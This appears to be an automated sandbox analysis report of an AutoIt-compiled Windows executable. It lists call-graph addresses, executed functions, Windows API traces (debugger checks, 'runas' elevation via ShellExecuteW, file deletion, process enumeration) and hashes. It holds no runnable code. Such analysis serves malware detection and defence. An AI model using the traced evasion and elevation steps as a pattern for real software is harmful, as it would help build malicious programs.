11 API calls 2 library calls 104456->104466 104458 d18528 104468 d13319 LeaveCriticalSection 104461->104468 104463 d1843e 104463->104441 104464->104455 104465->104455 104466->104458 104468->104463 104474->104397 104510 d0ec51 104507->104510 104709->104107 104710 d3400f 104725 ceeeb0 ISource 104710->104725 104711 cef211 PeekMessageW 104711->104725 104712 ceef07 GetInputState 104712->104711 104712->104725 104713 cef0d5 104715 d332cd TranslateAcceleratorW 104715->104725 104716 cef28f PeekMessageW 104716->104725 104717 cef273 TranslateMessage DispatchMessageW 104717->104716 104718 cef104 timeGetTime 104718->104725 104719 cef2af Sleep 104737 cef2c0 104719->104737 104720 d34183 Sleep 104720->104737 104721 cff215 timeGetTime 104721->104737 104722 d333e9 timeGetTime 104777 cfaa65 9 API calls 104722->104777 104724 d4dd87 46 API calls 104724->104737 104725->104711 104725->104712 104725->104713 104725->104715 104725->104716 104725->104717 104725->104718 104725->104719 104725->104720 104725->104722 104739 cf0340 207 API calls 104725->104739 104740 cf2b20 207 API calls 104725->104740 104742 cef450 104725->104742 104749 cef6d0 104725->104749 104772 cfe915 104725->104772 104778 d5446f 8 API calls 104725->104778 104779 d53fe1 81 API calls __wsopen_s 104725->104779 104726 d3421a GetExitCodeProcess 104727 d34230 WaitForSingleObject 104726->104727 104728 d34246 CloseHandle 104726->104728 104727->104725 104727->104728 104728->104737 104730 d33d51 104732 d33d59 104730->104732 104731 d7345b GetForegroundWindow 104731->104737 104733 d342b8 Sleep 104733->104725 104737->104721 104737->104724 104737->104725 104737->104726 104737->104730 104737->104731 104737->104733 104780 d660b5 8 API calls 104737->104780 104781 d4f292 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 104737->104781 104739->104725 104740->104725 104743 cef46f 104742->104743 104744 cef483 104742->104744 104782 cee960 104743->104782 104814 d53fe1 81 API calls __wsopen_s 104744->104814 104747 cef47a 104747->104725 104748 d34584 104748->104748 104750 cef707 104749->104750 104766 cef7dc ISource 104750->104766 104831 d005b2 5 API calls __Init_thread_wait 104750->104831 104753 d345d9 104755 cebf73 8 API calls 104753->104755 104753->104766 104754 cebf73 8 API calls 104754->104766 104758 d345f3 104755->104758 104756 cebe2d 39 API calls 104756->104766 104832 d00413 29 API calls __onexit 104758->104832 104761 d345fd 104833 d00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104761->104833 104763 cf0340 207 API calls 104763->104766 104764 d53fe1 81 API calls 104764->104766 104766->104754 104766->104756 104766->104763 104766->104764 104767 cebed9 8 API calls 104766->104767 104768 cf1ca0 8 API calls 104766->104768 104769 cefae1 104766->104769 104830 cfb35c 207 API calls 104766->104830 104834 d005b2 5 API calls __Init_thread_wait 104766->104834 104835 d00413 29 API calls __onexit 104766->104835 104836 d00568 EnterCriticalSection LeaveCriticalSection SetEvent ResetEvent 104766->104836 104837 d65231 101 API calls 104766->104837 104838 d6731e 207 API calls 104766->104838 104767->104766 104768->104766 104769->104725 104773 cfe959 104772->104773 104775 cfe928 104772->104775 104773->104725 104774 cfe94c IsDialogMessageW 104774->104773 104774->104775 104775->104773 104775->104774 104776 d3eff6 GetClassLongW 104775->104776 104776->104774 104776->104775 104777->104725 104778->104725 104779->104725 104780->104737 104781->104737 104783 cf0340 207 API calls 104782->104783 104804 cee99d 104783->104804 104784 d331d3 104828 d53fe1 81 API calls __wsopen_s 104784->104828 104786 ceea0b ISource 104786->104747 104787 ceeac3 104789 ceeace 104787->104789 104790 ceedd5 104787->104790 104788 ceecff 104791 d331c4 104788->104791 104792 ceed14 104788->104792 104794 d0014b 8 API calls 104789->104794 104790->104786 104799 d0017b 8 API calls 104790->104799 104827 d66162 8 API calls 104791->104827 104797 d0014b 8 API calls 104792->104797 104793 ceebb8 104800 d0017b 8 API calls 104793->104800 104795 ceead5 __fread_nolock 104794->104795 104802 d0014b 8 API calls 104795->104802 104803 ceeaf6 104795->104803 104807 ceeb6a 104797->104807 104798 d0014b 8 API calls 104798->104804 104799->104795 104801 ceeb29 ISource __fread_nolock 104800->104801 104801->104788 104806 d331b3 104801->104806 104801->104807 104810 d3318e 104801->104810 104812 d3316c 104801->104812 104823 ce44fe 207 API calls 104801->104823 104802->104803 104803->104801 104815 ced260 104803->104815 104804->104784 104804->104786 104804->104787 104804->104790 104804->104793 104804->104798 104804->104801 104826 d53fe1 81 API calls __wsopen_s 104806->104826 104807->104747 104825 d53fe1 81 API calls __wsopen_s 104810->104825 104824 d53fe1 81 API calls __wsopen_s 104812->104824 104814->104748 104816 ced29a 104815->104816 104817 ced2c6 104815->104817 104818 cef6d0 207 API calls 104816->104818 104821 ced2a0 104816->104821 104819 cf0340 207 API calls 104817->104819 104818->104821 104820 d3184b 104819->104820 104820->104821 104829 d53fe1 81 API calls __wsopen_s 104820->104829 104821->104801 104823->104801 104824->104807 104825->104807 104826->104807 104827->104784 104828->104786 104829->104821 104830->104766 104831->104753 104832->104761 104833->104766 104834->104766 104835->104766 104836->104766 104837->104766 104838->104766 104839 ce1033 104844 ce68b4 104839->104844 104843 ce1042 104845 cebf73 8 API calls 104844->104845 104846 ce6922 104845->104846 104852 ce589f 104846->104852 104848 ce69bf 104850 ce1038 104848->104850 104855 ce6b14 8 API calls __fread_nolock 104848->104855 104851 d00413 29 API calls __onexit 104850->104851 104851->104843 104856 ce58cb 104852->104856 104855->104848 104857 ce58be 104856->104857 104858 ce58d8 104856->104858 104857->104848 104858->104857 104859 ce58df RegOpenKeyExW 104858->104859 104859->104857 104860 ce58f9 RegQueryValueExW 104859->104860 104861 ce592f RegCloseKey 104860->104861 104862 ce591a 104860->104862 104861->104857 104862->104861 104863 d0f06e 104864 d0f07a ___DestructExceptionObject 104863->104864 104865 d0f086 104864->104865 104866 d0f09b 104864->104866 104882 d0f649 20 API calls __dosmaperr 104865->104882 104876 d094fd EnterCriticalSection 104866->104876 104869 d0f08b 104883 d12b5c 26 API calls pre_c_initialization 104869->104883 104870 d0f0a7 104877 d0f0db 104870->104877 104875 d0f096 __wsopen_s 104876->104870 104885 d0f106 104877->104885 104879 d0f0e8 104881 d0f0b4 104879->104881 104905 d0f649 20 API calls __dosmaperr 104879->104905 104884 d0f0d1 LeaveCriticalSection __fread_nolock 104881->104884 104882->104869 104883->104875 104884->104875 104886 d0f114 104885->104886 104887 d0f12e 104885->104887 104909 d0f649 20 API calls __dosmaperr 104886->104909 104889 d0dcc5 __fread_nolock 26 API calls 104887->104889 104891 d0f137 104889->104891 104890 d0f119 104910 d12b5c 26 API calls pre_c_initialization 104890->104910 104906 d19789 104891->104906 104895 d0f23b 104897 d0f248 104895->104897 104901 d0f1ee 104895->104901 104896 d0f1bf 104899 d0f1dc 104896->104899 104896->104901 104912 d0f649 20 API calls __dosmaperr 104897->104912 104911 d0f41f 31 API calls 4 library calls 104899->104911 104902 d0f124 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 104901->104902 104913 d0f29b 30 API calls 2 library calls 104901->104913 104902->104879 104903 d0f1e6 104903->104902 104905->104881 104914 d19606 104906->104914 104908 d0f153 104908->104895 104908->104896 104908->104902 104909->104890 104910->104902 104911->104903 104912->104902 104913->104902 104915 d19612 ___DestructExceptionObject 104914->104915 104916 d19632 104915->104916 104917 d1961a 104915->104917 104918 d196e6 104916->104918 104924 d1966a 104916->104924 104940 d0f636 20 API calls __dosmaperr 104917->104940 104945 d0f636 20 API calls __dosmaperr 104918->104945 104921 d1961f 104941 d0f649 20 API calls __dosmaperr 104921->104941 104923 d196eb 104946 d0f649 20 API calls __dosmaperr 104923->104946 104939 d154ba EnterCriticalSection 104924->104939 104927 d196f3 104947 d12b5c 26 API calls pre_c_initialization 104927->104947 104928 d19670 104930 d19694 104928->104930 104931 d196a9 104928->104931 104942 d0f649 20 API calls __dosmaperr 104930->104942 104933 d1970b __wsopen_s 28 API calls 104931->104933 104936 d196a4 104933->104936 104934 d19699 104943 d0f636 20 API calls __dosmaperr 104934->104943 104935 d19627 __wsopen_s 104935->104908 104944 d196de LeaveCriticalSection __wsopen_s 104936->104944 104939->104928 104940->104921 104941->104935 104942->104934 104943->104936 104944->104935 104945->104923 104946->104927 104947->104935

                                                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                                                  Function 00CE5FC8 Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 236libraryloaderCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 237 ce5fc8-ce6037 call cebf73 GetVersionExW call ce8577 242 ce603d 237->242 243 d2507d-d25090 237->243 245 ce603f-ce6041 242->245 244 d25091-d25095 243->244 246 d25097 244->246 247 d25098-d250a4 244->247 248 ce6047-ce60a6 call ceadf4 call ce55dc 245->248 249 d250bc 245->249 246->247 247->244 251 d250a6-d250a8 247->251 261 ce60ac-ce60ae 248->261 262 d25224-d2522b 248->262 254 d250c3-d250cf 249->254 251->245 253 d250ae-d250b5 251->253 253->243 257 d250b7 253->257 255 ce611c-ce6136 GetCurrentProcess IsWow64Process 254->255 259 ce6138 255->259 260 ce6195-ce619b 255->260 257->249 263 ce613e-ce614a 259->263 260->263 264 d25125-d25138 261->264 265 ce60b4-ce60b7 261->265 266 d2524b-d2524e 262->266 267 d2522d 262->267 268 d25269-d2526d GetSystemInfo 263->268 269 ce6150-ce615f LoadLibraryA 263->269 270 d25161-d25163 264->270 271 d2513a-d25143 264->271 265->255 272 ce60b9-ce60f5 265->272 274 d25250-d2525f 266->274 275 d25239-d25241 266->275 273 d25233 267->273 276 ce619d-ce61a7 GetSystemInfo 269->276 277 ce6161-ce616f GetProcAddress 269->277 282 d25165-d2517a 270->282 283 d25198-d2519b 270->283 279 d25150-d2515c 271->279 280 d25145-d2514b 271->280 272->255 281 ce60f7-ce60fa 272->281 273->275 274->273 284 d25261-d25267 274->284 275->266 278 ce6177-ce6179 276->278 277->276 285 ce6171-ce6175 GetNativeSystemInfo 277->285 286 ce617b-ce617c FreeLibrary 278->286 287 ce6182-ce6194 278->287 279->255 280->255 288 d250d4-d250e4 281->288 289 ce6100-ce610a 281->289 290 d25187-d25193 282->290 291 d2517c-d25182 282->291 292 d251d6-d251d9 283->292 293 d2519d-d251b8 283->293 284->275 285->278 286->287 294 d250e6-d250f2 288->294 295 d250f7-d25101 288->295 289->254 297 ce6110-ce6116 289->297 290->255 291->255 292->255 296 d251df-d25206 292->296 298 d251c5-d251d1 293->298 299 d251ba-d251c0 293->299 294->255 300 d25103-d2510f 295->300 301 d25114-d25120 295->301 302 d25213-d2521f 296->302 303 d25208-d2520e 296->303 297->255 298->255 299->255 300->255 301->255 302->255 303->255
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetVersionExW.KERNEL32(?), ref: 00CE5FF7
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(?,00D7DC2C,00000000,?,?), ref: 00CE6123
                                                                                                                                                                                                                                                                  • IsWow64Process.KERNEL32(00000000,?,?), ref: 00CE612A
                                                                                                                                                                                                                                                                  • LoadLibraryA.KERNEL32(kernel32.dll,?,?), ref: 00CE6155
                                                                                                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00CE6167
                                                                                                                                                                                                                                                                  • GetNativeSystemInfo.KERNEL32(?,?,?), ref: 00CE6175
                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(00000000,?,?), ref: 00CE617C
                                                                                                                                                                                                                                                                  • GetSystemInfo.KERNEL32(?,?,?), ref: 00CE61A1
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: InfoLibraryProcessSystem$AddressCurrentFreeLoadNativeProcVersionWow64_wcslen
                                                                                                                                                                                                                                                                  • String ID: GetNativeSystemInfo$kernel32.dll$|O
                                                                                                                                                                                                                                                                  • API String ID: 3290436268-3101561225
                                                                                                                                                                                                                                                                  • Opcode ID: 9d4cd7e566c8a3d76e9dc4d9853f7f907e180c54dbc579d41b90296407c21481
                                                                                                                                                                                                                                                                  • Instruction ID: 9c806c828ba0ff7bfd00a5b55535d4daf195bba7bcca41bbccf5a8fd95e48c53
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d4cd7e566c8a3d76e9dc4d9853f7f907e180c54dbc579d41b90296407c21481
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1EA1B22381A3E4CFC712CB6A7C455B93FE56B36344B084A9DD481D7366DA3E4948CB36
                                                                                                                                                                                                                                                                  Function 00CE338B Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 148windowCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,00CE3368,?), ref: 00CE33BB
                                                                                                                                                                                                                                                                  • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,00CE3368,?), ref: 00CE33CE
                                                                                                                                                                                                                                                                  • GetFullPathNameW.KERNEL32(00007FFF,?,?,00DB2418,00DB2400,?,?,?,?,?,?,00CE3368,?), ref: 00CE343A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE8577: _wcslen.LIBCMT ref: 00CE858A
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE425F: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00CE3462,00DB2418,?,?,?,?,?,?,?,00CE3368,?), ref: 00CE42A0
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00000001,00DB2418,?,?,?,?,?,?,?,00CE3368,?), ref: 00CE34BB
                                                                                                                                                                                                                                                                  • MessageBoxA.USER32(00000000,It is a violation of the AutoIt EULA to attempt to reverse engineer this program.,AutoIt,00000010), ref: 00D23CB0
                                                                                                                                                                                                                                                                  • SetCurrentDirectoryW.KERNEL32(?,00DB2418,?,?,?,?,?,?,?,00CE3368,?), ref: 00D23CF1
                                                                                                                                                                                                                                                                  • GetForegroundWindow.USER32(runas,?,?,?,00000001,?,00DA31F4,00DB2418,?,?,?,?,?,?,?,00CE3368), ref: 00D23D7A
                                                                                                                                                                                                                                                                  • ShellExecuteW.SHELL32(00000000,?,?), ref: 00D23D81
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: GetSysColorBrush.USER32(0000000F), ref: 00CE34DE
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: LoadCursorW.USER32(00000000,00007F00), ref: 00CE34ED
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: LoadIconW.USER32(00000063), ref: 00CE3503
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: LoadIconW.USER32(000000A4), ref: 00CE3515
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: LoadIconW.USER32(000000A2), ref: 00CE3527
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00CE353F
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE34D3: RegisterClassExW.USER32(?), ref: 00CE3590
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE35B3: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00CE35E1
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE35B3: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00CE3602
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00CE3368,?), ref: 00CE3616
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE35B3: ShowWindow.USER32(00000000,?,?,?,?,?,?,00CE3368,?), ref: 00CE361F
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE396B: Shell_NotifyIconW.SHELL32(00000000,?), ref: 00CE3A3C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  • runas, xrefs: 00D23D75
                                                                                                                                                                                                                                                                  • It is a violation of the AutoIt EULA to attempt to reverse engineer this program., xrefs: 00D23CAA
                                                                                                                                                                                                                                                                  • AutoIt, xrefs: 00D23CA5
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__wcslen
                                                                                                                                                                                                                                                                  • String ID: AutoIt$It is a violation of the AutoIt EULA to attempt to reverse engineer this program.$runas
                                                                                                                                                                                                                                                                  • API String ID: 683915450-2030392706
                                                                                                                                                                                                                                                                  • Opcode ID: bc6d14ee57c0020e770bfdf83ab3b089ebf03d0d50f6573cd30ed4e24fb09bec
                                                                                                                                                                                                                                                                  • Instruction ID: 04ee4b0736e4d41cf8d9da6e8b57056775d5887f8c87acb1634d54b5605e6a03
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bc6d14ee57c0020e770bfdf83ab3b089ebf03d0d50f6573cd30ed4e24fb09bec
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D051C5321083C0EED701EF66DC05D7B7FB99FA5744F04052CF596932A2DB259A49AB32
                                                                                                                                                                                                                                                                  Function 00D4DC54 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 91fileCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                    • Part of subcall function 00CE5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00CE55D1,?,?,00D24B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00CE5871
                                                                                                                                                                                                                                                                    • Part of subcall function 00D4EAB0: GetFileAttributesW.KERNEL32(?,00D4D840), ref: 00D4EAB1
                                                                                                                                                                                                                                                                  • FindFirstFileW.KERNEL32(?,?), ref: 00D4DCCB
                                                                                                                                                                                                                                                                  • DeleteFileW.KERNEL32(?,?,?,?), ref: 00D4DD1B
                                                                                                                                                                                                                                                                  • FindNextFileW.KERNELBASE(00000000,00000010), ref: 00D4DD2C
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D4DD43
                                                                                                                                                                                                                                                                  • FindClose.KERNEL32(00000000), ref: 00D4DD4C
                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: FileFind$Close$AttributesDeleteFirstFullNameNextPath
                                                                                                                                                                                                                                                                  • String ID: \*.*
                                                                                                                                                                                                                                                                  • API String ID: 2649000838-1173974218
                                                                                                                                                                                                                                                                  • Opcode ID: 95172514cbf01b0cb8c57b6c60b497ad56af074564624be038f39019403137dd
                                                                                                                                                                                                                                                                  • Instruction ID: 06472cfad8276997a5eab9d9b868b723c820eba9116b5991c9234598ddd39838
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 95172514cbf01b0cb8c57b6c60b497ad56af074564624be038f39019403137dd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 15317A31008385AFC301EB60CC819AFB7E9BE95304F444E1DF4D592292EB21DE0ADB66
                                                                                                                                                                                                                                                                  Function 00D4DD87 Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                  control_flow_graph 1578 d4dd87-d4ddcf CreateToolhelp32Snapshot Process32FirstW call d4e80e 1581 d4de7d-d4de80 1578->1581 1582 d4ddd4-d4dde3 Process32NextW 1581->1582 1583 d4de86-d4de95 CloseHandle 1581->1583 1582->1583 1584 d4dde9-d4de58 call cebf73 * 2 call ceb329 call ce568e call cebd98 call ce7bb5 call cfe36b 1582->1584 1599 d4de62-d4de69 1584->1599 1600 d4de5a-d4de5c 1584->1600 1602 d4de6b-d4de78 call cebd98 * 2 1599->1602 1601 d4de5e-d4de60 1600->1601 1600->1602 1601->1599 1601->1602 1602->1581
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • CreateToolhelp32Snapshot.KERNEL32 ref: 00D4DDAC
                                                                                                                                                                                                                                                                  • Process32FirstW.KERNEL32(00000000,?), ref: 00D4DDBA
                                                                                                                                                                                                                                                                  • Process32NextW.KERNEL32(00000000,?), ref: 00D4DDDA
                                                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00D4DE87
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 420147892-0
                                                                                                                                                                                                                                                                  • Opcode ID: a4a043eb29b855522596760297ab2b2f695261afc64f1230128f0e461a066a7c
                                                                                                                                                                                                                                                                  • Instruction ID: ad80d14d698b0b6f4c4db5c33e3f3d0d33d98bbac99d77d890ad9a5154c59693
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a4a043eb29b855522596760297ab2b2f695261afc64f1230128f0e461a066a7c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 4731A2710083409FD301EF50CC85ABFBBF9AF99350F44092DF585871A1EB719949DBA2
                                                                                                                                                                                                                                                                  Function 00CEEE50 Relevance: 21.6, APIs: 14, Instructions: 614windowsleeptimeCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetInputState.USER32 ref: 00CEEF07
                                                                                                                                                                                                                                                                  • timeGetTime.WINMM ref: 00CEF107
                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CEF228
                                                                                                                                                                                                                                                                  • TranslateMessage.USER32(?), ref: 00CEF27B
                                                                                                                                                                                                                                                                  • DispatchMessageW.USER32(?), ref: 00CEF289
                                                                                                                                                                                                                                                                  • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00CEF29F
                                                                                                                                                                                                                                                                  • Sleep.KERNEL32(0000000A), ref: 00CEF2B1
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2642567968.0000000000CE1000.00000020.00000001.01000000.00000007.sdmp, Offset: 00CE0000, based on PE: true
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642495169.0000000000CE0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000D7D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2642897706.0000000000DA3000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643098350.0000000000DAD000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2643199129.0000000000DB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_ce0000_Participating.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID: Message$Peek$DispatchInputSleepStateTimeTranslatetime
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID: 2189390790-0
                                                                                                                                                                                                                                                                  • Opcode ID: 843a9524b33f3f792f10fc4345003edd08a434550d3e738554cd3419f5a43d88
                                                                                                                                                                                                                                                                  • Instruction ID: 557f3935d001adaf84a4f5134d745af02f2a25099712cd6b64ec505d93f4b2d6
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 843a9524b33f3f792f10fc4345003edd08a434550d3e738554cd3419f5a43d88
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 01321330604781EFD728CF25C844B6AB7E5FF81304F18462DE569873A1D775EA85CBA2
                                                                                                                                                                                                                                                                  Function 00CE3624 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 53windowregistryCOMMON
                                                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                  • GetSysColorBrush.USER32(0000000F), ref: 00CE3657
                                                                                                                                                                                                                                                                  • RegisterClassExW.USER32(00000030), ref: 00CE3681
                                                                                                                                                                                                                                                                  • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 00CE3692
                                                                                                                                                                                                                                                                  • InitCommonControlsEx.COMCTL32(?), ref: 00CE36AF
                                                                                                                                                                                                                                                                  • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001), ref: 00CE36BF
